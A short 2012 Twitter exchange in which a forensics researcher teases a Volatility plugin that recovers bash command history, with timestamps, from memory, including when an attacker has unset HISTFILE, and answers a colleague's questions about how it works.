Month of @volatility plugins teaser: Recovering .bash_history from memory, even in the face of anti-forensics: pastebin.com/Pj39TMrU #dfir
3
13
7
@attrc Does it only work if history timestamps are enabled?
1
@hal_pomeranz nope, that's the awesome part, bash keeps them anyway
1
Replying to @attrc
@attrc Ah, I gotcha-- identifying the bash processes and sucking the history out?

Sep 9, 2012 · 10:28 PM UTC

2
Replying to @hal_pomeranz
@hal_pomeranz yep using the structures in mem so u get time run and command together
1
Replying to @hal_pomeranz
@hal_pomeranz also works if histfile / histsize is unset by the attacker